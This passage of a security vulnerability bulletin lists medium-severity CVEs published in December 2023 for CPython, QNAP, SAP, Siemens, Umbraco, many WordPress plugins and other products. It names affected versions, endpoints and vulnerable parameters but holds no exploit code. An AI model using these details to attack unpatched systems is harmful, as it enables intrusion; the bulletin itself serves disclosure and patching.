python — python An issue was found in CPython 3.12.0 `subprocess` module on POSIX platforms. The issue was fixed in CPython 3.12.1 and does not affect other stable releases. When using the `extra_groups=` parameter with an empty list as a value (ie `extra_groups=[]`) the logic regressed to not call `setgroups(0, NULL)` before calling `exec()`, thus not dropping the original processes’ groups before starting the new process. There is no issue when the parameter isn’t used or when any value is used besides an empty list. This issue only impacts CPython processes run with sufficient privilege to make the `setgroups` system call (typically `root`). 2023-12-08 4.9 CVE-2023-6507
cna@python.org
qnap — qts A cross-site scripting (XSS) vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to inject malicious code via a network. We have already fixed the vulnerability in the following versions: QTS 5.0.1.2425 build 20230609 and later; QTS 5.1.0.2444 build 20230629 and later; QTS 4.5.4.2467 build 20230718 and later; QuTS hero h5.1.0.2424 build 20230609 and later; QuTS hero h5.0.1.2515 build 20230907 and later; QuTS hero h4.5.4.2476 build 20230728 and later. 2023-12-08 6.1 CVE-2023-23372
security@qnapsecurity.com.tw
qualys — private_cloud_platform A Qualys web application was found to have a stored XSS vulnerability resulting from the absence of HTML encoding in the presentation of logging information to users. This vulnerability allowed a user with login access to the application to introduce XSS payload via browser details.  2023-12-08 5.4 CVE-2023-6146
bugreport@qualys.com
redhat — advanced_cluster_security In Red Hat Advanced Cluster Security (RHACS), it was found that some security related HTTP headers were missing, allowing an attacker to exploit this with a clickjacking attack. An attacker could exploit this by convincing a valid RHACS user to visit an attacker-controlled web page, that deceptively points to valid RHACS endpoints, hijacking the user’s account permissions to perform other actions. 2023-12-12 6.1 CVE-2023-4958
secalert@redhat.com
repox — repox An XSS vulnerability has been detected in Repox, which allows an attacker to compromise interactions between a user and the vulnerable application, and can be exploited by a third party by sending a specially crafted JavaScript payload to a user, and thus gain full control of their session. 2023-12-13 6.3 CVE-2023-6719
cve-coordination@incibe.es
repox — repox An XSS vulnerability stored in Repox has been identified, which allows a local attacker to store a specially crafted JavaScript payload on the server, due to the lack of proper sanitisation of field elements, allowing the attacker to trigger the malicious payload when the application loads. 2023-12-13 5.5 CVE-2023-6720
cve-coordination@incibe.es
samsung — exynos_980_firmware Samsung Mobile Processor and Wearable Processor (Exynos 980, 850, 1080, 2100, 2200, 1280, 1380, 1330, and W920) allow Information Disclosure in the Bootloader. 2023-12-13 4.6 CVE-2023-43122
cve@mitre.org
samsung — exynos_9820_firmware A TOCTOU race condition in Samsung Mobile Processor Exynos 9820, Exynos 980, Exynos 1080, Exynos 2100, Exynos 2200, Exynos 1280, and Exynos 1380 can cause unexpected termination of a system. 2023-12-13 4.7 CVE-2023-42483
cve@mitre.org
samsung — exynos_9820_firmware A race condition issue discovered in Samsung Mobile Processor Exynos 9820, 980, 1080, 2100, 2200, 1280, and 1380 allows unintended modifications of values within certain areas. 2023-12-13 4.7 CVE-2023-45864
cve@mitre.org
sap — biller_direct An unauthenticated attacker can embed a hidden access to a Biller Direct URL in a frame which, when loaded by the user, will submit a cross-site scripting request to the Biller Direct system. This can result in the disclosure or modification of non-sensitive information. 2023-12-12 6.1 CVE-2023-42479
cna@sap.com
sap — businessobjects_web_intelligence SAP Business Objects Web Intelligence – version 420, allows an authenticated attacker to inject JavaScript code into Web Intelligence documents which is then executed in the victim’s browser each time the vulnerable page is visited. Successful exploitation can lead to exposure of the data that the user has access to. In the worst case, attacker could access data from reporting databases. 2023-12-12 6.8 CVE-2023-42476
cna@sap.com
sap — fiori_launchpad SAP Fiori launchpad – versions SAP_UI 750, SAP_UI 754, SAP_UI 755, SAP_UI 756, SAP_UI 757, SAP_UI 758, UI_700 200, SAP_BASIS 793, allows an attacker to use HTTP verb POST on read-only service causing low impact on Confidentiality of the application. 2023-12-12 4.3 CVE-2023-49584
cna@sap.com
sap — master_data_governance SAP Master Data Governance File Upload application allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing ‘traverse to parent directory’ are passed through to the file APIs. As a result, it has a low impact to the confidentiality. 2023-12-12 5.3 CVE-2023-49058
cna@sap.com
sap — solution_manager SAP Solution Manager – version 720, allows an authorized attacker to execute certain deprecated function modules which can read or modify data of same or other component without user interaction over the network. 2023-12-12 6.4 CVE-2023-49587
cna@sap.com
sap_se — sap_gui SAP GUI for Windows and SAP GUI for Java allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to write data to a database table. By doing so the attacker could increase response times of the AS ABAP, leading to mild impact on availability. 2023-12-12 4.1 CVE-2023-49581
cna@sap.com
sap_se — sap_hcm_(smart_paye_solution) The SAP HCM (SMART PAYE solution) – versions S4HCMCIE 100, SAP_HRCIE 600, SAP_HRCIE 604, SAP_HRCIE 608, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. After successful exploitation, an attacker can cause limited impact on confidentiality and integrity of the application. 2023-12-12 6.1 CVE-2023-49577
cna@sap.com
sas — integration_technologies SAS application is vulnerable to Reflected Cross-Site Scripting (XSS). Improper input validation in the `_program` parameter of the `/SASStoredProcess/do` endpoint allows arbitrary JavaScript to be executed when a specially crafted URL is opened by an authenticated user. The attack is possible from a low-privileged user. Only versions 9.4_M7 and 9.4_M8 were tested and confirmed to be vulnerable; the status of others is unknown. Hot fixes were published for the above-mentioned versions. 2023-12-12 5.4 CVE-2023-4932
cvd@cert.pl
schneider_electric — easy_ups_online_monitoring A CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability exists that could cause arbitrary file deletion upon service restart when accessed by a local and low-privileged attacker. 2023-12-14 5.3 CVE-2023-6407
cybersecurity@se.com
schneider_electric — trio_q-series_ethernet_data_radio A CWE-494: Download of Code Without Integrity Check vulnerability exists that could allow a privileged user to install an untrusted firmware. 2023-12-14 6.5 CVE-2023-5630
cybersecurity@se.com
seafile — seafile The next parameter in the /accounts/login endpoint of Seafile 9.0.6 allows attackers to redirect users to arbitrary sites. 2023-12-09 6.1 CVE-2023-28874
cve@mitre.org
seafile — seafile An XSS issue in wiki and discussion pages in Seafile 9.0.6 allows attackers to inject JavaScript into the Markdown editor. 2023-12-09 5.4 CVE-2023-28873
cve@mitre.org
semantic-mediawiki — semantic_mediawiki Special:Ask in Semantic MediaWiki before 4.0.2 allows Reflected XSS. 2023-12-10 6.1 CVE-2022-48614
cve@mitre.org
siemens — multiple_products A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). A reflected cross-site scripting (XSS) vulnerability exists in the web interface of the affected applications that could allow an attacker to inject arbitrary JavaScript code. The code could be potentially executed later by another (possibly privileged) user. 2023-12-12 6.1 CVE-2023-46282
productcert@siemens.com
siemens — simatic A vulnerability has been identified in SIMATIC STEP 7 (TIA Portal) (All versions < V19). An information disclosure vulnerability could allow a local attacker to gain access to the access level password of the SIMATIC S7-1200 and S7-1500 CPUs, when entered by a legitimate user in the hardware configuration of the affected application. 2023-12-12 5.5 CVE-2022-46141
productcert@siemens.com
silicon_labs — multiple_products A denial of service vulnerability exists in all Silicon Labs Z-Wave controller and endpoint devices running Z-Wave SDK v7.20.3 (Gecko SDK v4.3.3) and earlier. This attack can be carried out only by devices on the network sending a stream of packets to the device. 2023-12-15 5.7 CVE-2023-5310
product-security@silabs.com
silicon_labs — z/ip_gateway_sdk The first S0 encryption key is generated with an uninitialized PRNG in Z/IP Gateway products running Silicon Labs Z/IP Gateway SDK v7.18.3 and earlier. This makes the first S0 key generated at startup predictable, potentially allowing network key prediction and unauthorized S0 network access. 2023-12-14 6.4 CVE-2023-4489
product-security@silabs.com
silverpeas — silverpeas Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control via the “Porlet Deployer” which allows administrators to deploy .WAR portlets. 2023-12-13 4.9 CVE-2023-47321
cve@mitre.org
sissbruecker — linkding A vulnerability classified as problematic has been found in linkding 1.23.0. Affected is an unknown function. The manipulation of the argument q leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.23.1 is able to address this issue. It is recommended to upgrade the affected component. VDB-247338 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early, responded in a very professional manner and immediately released a fixed version of the affected product. 2023-12-09 5.4 CVE-2023-6646
cna@vuldb.com
smartstar_software — cws SmartStar Software CWS is a web-base integration platform, it has a vulnerability of using a hard-coded for a specific account with low privilege. An unauthenticated remote attacker can exploit this vulnerability to run partial processes and obtain partial information, but can’t disrupt service or obtain sensitive information. 2023-12-15 6.5 CVE-2023-48374
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a special URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability. 2023-12-15 6.5 CVE-2023-48381
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a mail deliver-related URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability. 2023-12-15 6.5 CVE-2023-48382
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform. It has inadequate filtering for a specific URL parameter within a specific function. An unauthenticated remote attacker can perform a Blind SSRF attack to discover internal network topology based on the URL error response. 2023-12-15 5.3 CVE-2023-48379
twcert@cert.org.tw
sourcecodester — online_tours_&_travels_management_system A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. This issue affects the function prepare of the file email_setup.php. The manipulation of the argument name leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247895. 2023-12-13 5.5 CVE-2023-6765
cna@vuldb.com
sourcecodester — simple_invoice_generator_system A vulnerability was found in SourceCodester Simple Invoice Generator System 1.0 and classified as problematic. This issue affects some unknown processing of the file login.php. The manipulation of the argument cashier leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247343. 2023-12-10 6.1 CVE-2023-6650
cna@vuldb.com
sourcecodester — simple_student_attendance_system A vulnerability, which was classified as critical, has been found in SourceCodester Simple Student Attendance System 1.0. This issue affects the function save_attendance of the file actions.class.php. The manipulation of the argument sid leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247907. 2023-12-13 5.5 CVE-2023-6771
cna@vuldb.com
sourcecodester — wedding_guest_e-book A vulnerability, which was classified as problematic, was found in SourceCodester Wedding Guest e-Book 1.0. This affects an unknown part of the file /endpoint/add-guest.php. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-247899. 2023-12-13 4.3 CVE-2023-6767
cna@vuldb.com
specklesystems — speckle-server Speckle Server provides server, frontend, 3D viewer, and other JavaScript utilities for the Speckle 3D data platform. A vulnerability in versions prior to 2.17.6 affects users who: authorized an application which requested a ‘token write’ scope or, using frontend-2, created a Personal Access Token (PAT) with `token write` scope. When creating a new token an agent needs to authorise the request with an existing token (the ‘requesting token’). The requesting token is required to have token write scope in order to generate new tokens. However, Speckle server was not verifying that other privileges granted to the new token were not in excess of the privileges of the requesting token. A malicious actor could use a token with only token write scope to subsequently generate further tokens with additional privileges. These privileges would only grant privileges up to the existing privileges of the user. This vulnerability cannot be used to escalate a user’s privileges or grant privileges on behalf of other users. This has been patched as of version 2.17.6. All operators of Speckle servers should upgrade their server to version 2.17.6 or higher. Any users who authorized an application with ‘token write’ scope, or created a token in frontend-2 with `token write` scope should review existing tokens and permanently revoke any they do not recognize, revoke existing tokens and create new tokens, and review usage of their account for suspicious activity. No known workarounds for this issue exist. 2023-12-14 6.5 CVE-2023-50713
security-advisories@github.com
taiwan-ca — jcicsecuritytool TAIWAN-CA(TWCA) JCICSecurityTool’s Registry-related functions have insufficient filtering for special characters. An unauthenticated remote attacker can inject malicious script into a webpage to perform XSS (Stored Cross-Site Scripting) attack. 2023-12-15 6.1 CVE-2023-48387
twcert@cert.org.tw
thecosy — icecms A vulnerability was found in Thecosy IceCMS 2.0.1. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /adplanet/PlanetUser of the component API. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247885 was assigned to this vulnerability. 2023-12-13 6.5 CVE-2023-6757
cna@vuldb.com
thecosy — icecms A vulnerability classified as critical was found in Thecosy IceCMS up to 2.0.1. This vulnerability affects unknown code. The manipulation leads to manage user sessions. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247888. 2023-12-13 5.4 CVE-2023-6760
cna@vuldb.com
thecosy — icecms A vulnerability was found in Thecosy IceCMS 2.0.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file /adplanet/PlanetCommentList of the component API. The manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247886 is the identifier assigned to this vulnerability. 2023-12-13 4.3 CVE-2023-6758
cna@vuldb.com
thecosy — icecms A vulnerability, which was classified as critical, was found in Thecosy IceCMS 2.0.1. Affected is an unknown function of the file /article/DelectArticleById/ of the component Article Handler. The manipulation leads to permission issues. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-247890 is the identifier assigned to this vulnerability. 2023-12-13 4.3 CVE-2023-6762
cna@vuldb.com
tongda — oa_2017 A vulnerability was found in Tongda OA 2017 up to 11.10. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/vote/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-16 5.5 CVE-2023-6885
cna@vuldb.com
typecho — typecho A vulnerability, which was classified as problematic, has been found in Typecho 1.2.1. Affected by this issue is some unknown functionality of the file /admin/manage-users.php. The manipulation of the argument page leads to information disclosure. The exploit has been disclosed to the public and may be used. VDB-247250 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 5.3 CVE-2023-6615
cna@vuldb.com
typecho — typecho A vulnerability classified as problematic has been found in Typecho 1.2.1. Affected is an unknown function of the file /admin/options-theme.php of the component Logo Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247248. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 4.8 CVE-2023-6613
cna@vuldb.com
ubuntu_budgie — budgie_extras Temporary data passed between application components by Budgie Extras Clockworks applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel. 2023-12-14 6 CVE-2023-49342
security@ubuntu.com
ubuntu_budgie — budgie_extras Temporary data passed between application components by Budgie Extras Dropby applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel. 2023-12-14 6 CVE-2023-49343
security@ubuntu.com
ubuntu_budgie — budgie_extras Temporary data passed between application components by Budgie Extras Window Shuffler applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel. 2023-12-14 6 CVE-2023-49344
security@ubuntu.com
ubuntu_budgie — budgie_extras Temporary data passed between application components by Budgie Extras Takeabreak applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel. 2023-12-14 6 CVE-2023-49345
security@ubuntu.com
ubuntu_budgie — budgie_extras Temporary data passed between application components by Budgie Extras WeatherShow applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel. 2023-12-14 6 CVE-2023-49346
security@ubuntu.com
ubuntu_budgie — budgie_extras Temporary data passed between application components by Budgie Extras Windows Previews could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may read private information from windows, present false information to users, or deny access to the application. 2023-12-14 6 CVE-2023-49347
security@ubuntu.com
umbraco — umbraco_cms Umbraco is an ASP.NET content management system (CMS). Starting in 10.0.0 and prior to versions 10.8.1 and 12.3.4, Umbraco contains a cross-site scripting (XSS) vulnerability enabling attackers to bring malicious content into a website or application. Versions 10.8.1 and 12.3.4 contain a patch for this issue. 2023-12-12 6.1 CVE-2023-48313
security-advisories@github.com
umbraco — umbraco_cms Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.0, Backoffice users with permissions to create packages can use path traversal and thereby write outside of the expected location. Versions 8.18.10, 10.8.1, and 12.3.0 contain a patch for this issue. 2023-12-12 6.5 CVE-2023-49089
security-advisories@github.com
umbraco — umbraco_cms Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.4, users with low privileges (Editor, etc.) are able to access some unintended endpoints. Versions 8.18.10, 10.8.1, and 12.3.4 contain a patch for this issue. 2023-12-12 5.4 CVE-2023-49273
security-advisories@github.com
umbraco — umbraco_cms Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.4, a user enumeration attack is possible when SMTP is not set up correctly, but reset password is enabled. Versions 8.18.10, 10.8.1, and 12.3.4 contain a patch for this issue. 2023-12-12 5.3 CVE-2023-49274
security-advisories@github.com
umbraco — umbraco_cms Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.4, a brute force exploit can be used to collect valid usernames. Versions 8.18.10, 10.8.1, and 12.3.4 contain a patch for this issue. 2023-12-12 5.3 CVE-2023-49278
security-advisories@github.com
umbraco — umbraco_cms Umbraco is an ASP.NET content management system (CMS). Starting in version 7.0.0 and prior to versions 7.15.11, 8.18.9, 10.7.0, 11.5.0, and 12.2.0, a user with access to the backoffice can upload SVG files that include scripts. If the user can trick another user to load the media directly in a browser, the scripts can be executed. Versions 7.15.11, 8.18.9, 10.7.0, 11.5.0, and 12.2.0 contain a patch for this issue. Some workarounds are available. Implement server-side file validation or serve all media from a different host (e.g., a CDN) than where Umbraco is hosted. 2023-12-12 5.4 CVE-2023-49279
security-advisories@github.com
umbraco — umbraco_cms Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.7.0, and 12.3.0, Backoffice users with send for approval permission but not publish permission are able to publish in some scenarios. Versions 8.18.10, 10.7.0, and 12.3.0 contain a patch for this issue. No known workarounds are available. 2023-12-12 4.3 CVE-2023-48227
security-advisories@github.com
voltronicpower — snmp_web_pro Cross Site Scripting (XSS) in Voltronic Power SNMP Web Pro v.1.1 allows an attacker to execute arbitrary code via a crafted script within a request to the webserver. 2023-12-12 6.1 CVE-2023-49563
cve@mitre.org
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Till Krüss Email Address Encoder allows Stored XSS. This issue affects Email Address Encoder: from n/a through 1.0.22. 2023-12-15 6.5 CVE-2023-48765
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Nima Saberi Aparat allows Stored XSS. This issue affects Aparat: from n/a through 1.7.1. 2023-12-14 6.5 CVE-2023-48770
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in EnigmaWeb WP Catalogue allows Stored XSS. This issue affects WP Catalogue: from n/a through 1.7.6. 2023-12-14 6.5 CVE-2023-48780
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in CurrencyRate.Today Currency Converter Calculator allows Stored XSS. This issue affects Currency Converter Calculator: from n/a through 1.3.1. 2023-12-14 6.5 CVE-2023-49149
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in CurrencyRate.Today Crypto Converter Widget allows Stored XSS. This issue affects Crypto Converter Widget: from n/a through 1.8.1. 2023-12-14 6.5 CVE-2023-49150
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Simple Calendar Simple Calendar – Google Calendar Plugin allows Stored XSS. This issue affects Simple Calendar – Google Calendar Plugin: from n/a through 3.2.6. 2023-12-14 6.5 CVE-2023-49151
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Labs64 Credit Tracker allows Stored XSS. This issue affects Credit Tracker: from n/a through 1.1.17. 2023-12-14 6.5 CVE-2023-49152
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in formzu Inc. Formzu WP allows Stored XSS. This issue affects Formzu WP: from n/a through 1.6.6. 2023-12-15 6.5 CVE-2023-49160
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WordPlus Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss allows Stored XSS. This issue affects Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss: from n/a through 2.4.0. 2023-12-14 6.5 CVE-2023-49168
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS. This issue affects Ads by datafeedr.Com: from n/a through 1.2.0. 2023-12-15 6.5 CVE-2023-49169
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in 10to8 Sign In Scheduling Online Appointment Booking System allows Stored XSS. This issue affects Sign In Scheduling Online Appointment Booking System: from n/a through 1.0.9. 2023-12-14 6.5 CVE-2023-49173
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in N.O.U.S. Open Useful and Simple Event post allows Stored XSS. This issue affects Event post: from n/a through 5.8.6. 2023-12-15 6.5 CVE-2023-49179
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Spiffy Plugins Spiffy Calendar allows Stored XSS. This issue affects Spiffy Calendar: from n/a through 4.9.5. 2023-12-14 6.5 CVE-2023-49745
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc allows Stored XSS. This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.5.3. 2023-12-14 6.5 CVE-2023-49820
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in BoldThemes Bold Page Builder allows Stored XSS. This issue affects Bold Page Builder: from n/a through 4.6.1. 2023-12-15 6.5 CVE-2023-49823
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo allows Stored XSS. This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo: from n/a through 6.4.2. 2023-12-14 6.5 CVE-2023-49828
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brainstorm Force Spectra – WordPress Gutenberg Blocks allows Stored XSS. This issue affects Spectra – WordPress Gutenberg Blocks: from n/a through 2.7.9. 2023-12-14 6.5 CVE-2023-49833
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Paul Bearne Author Avatars List/Block allows Stored XSS. This issue affects Author Avatars List/Block: from n/a through 2.1.17. 2023-12-14 6.5 CVE-2023-49846
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Twinpictures Annual Archive allows Stored XSS. This issue affects Annual Archive: from n/a through 1.6.0. 2023-12-14 6.5 CVE-2023-49847
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in weDevs WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts allows Stored XSS. This issue affects WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts: from n/a through 2.6.7. 2023-12-14 6.5 CVE-2023-49860
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Averta Shortcodes and extra features for Phlox theme allows Stored XSS. This issue affects Shortcodes and extra features for Phlox theme: from n/a through 2.15.2. 2023-12-14 6.5 CVE-2023-50368
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Alma Alma – Pay in installments or later for WooCommerce allows Stored XSS. This issue affects Alma – Pay in installments or later for WooCommerce: from n/a through 5.1.3. 2023-12-14 6.5 CVE-2023-50369
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Livemesh WPBakery Page Builder Addons by Livemesh allows Stored XSS. This issue affects WPBakery Page Builder Addons by Livemesh: from n/a through 3.5. 2023-12-14 6.5 CVE-2023-50370
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Page Visit Counter Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress allows Stored XSS. This issue affects Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress: from n/a through 8.0.6. 2023-12-14 6.5 CVE-2023-50371
audit@patchstack.com
wordpress — wordpress The EmbedPress WordPress plugin before 3.9.2 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin 2023-12-11 6.1 CVE-2023-5749
contact@wpscan.com
wordpress — wordpress The EmbedPress WordPress plugin before 3.9.2 does not sanitise and escape a parameter before outputting it back in the page containing a specific content, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin 2023-12-11 6.1 CVE-2023-5750
contact@wpscan.com
wordpress — wordpress The File Manager WordPress plugin before 6.3 does not restrict the file manager's root directory, allowing an administrator to set a root outside of the WordPress root directory, giving access to system files and directories even in a multisite setup, where site administrators should not be allowed to modify the site's files. 2023-12-11 6.5 CVE-2023-5907
contact@wpscan.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Andreas Münch Multiple Post Passwords allows Stored XSS. This issue affects Multiple Post Passwords: from n/a through 1.1.1. 2023-12-14 5.9 CVE-2023-49157
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Real Big Plugins Client Dash allows Stored XSS. This issue affects Client Dash: from n/a through 2.2.1. 2023-12-15 5.9 CVE-2023-49165
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS. This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5. 2023-12-15 5.9 CVE-2023-49174
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Kreativo Pro KP Fastest Tawk.To Chat allows Stored XSS. This issue affects KP Fastest Tawk.To Chat: from n/a through 1.1.1. 2023-12-15 5.9 CVE-2023-49175
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ternstyle LLC Automatic Youtube Video Posts Plugin allows Stored XSS. This issue affects Automatic Youtube Video Posts Plugin: from n/a through 5.2.2. 2023-12-15 5.9 CVE-2023-49180
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WP Event Manager WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce allows Stored XSS. This issue affects WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce: from n/a through 3.1.40. 2023-12-15 5.9 CVE-2023-49181
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WPDeveloper Parallax Slider Block allows Stored XSS. This issue affects Parallax Slider Block: from n/a through 1.2.4. 2023-12-15 5.9 CVE-2023-49184
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ZealousWeb Track Geolocation Of Users Using Contact Form 7 allows Stored XSS. This issue affects Track Geolocation Of Users Using Contact Form 7: from n/a through 1.4. 2023-12-15 5.9 CVE-2023-49188
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Getsocial, S.A. Social Share Buttons & Analytics Plugin – GetSocial.Io allows Stored XSS. This issue affects Social Share Buttons & Analytics Plugin – GetSocial.Io: from n/a through 4.3.12. 2023-12-15 5.9 CVE-2023-49189
audit@patchstack.com
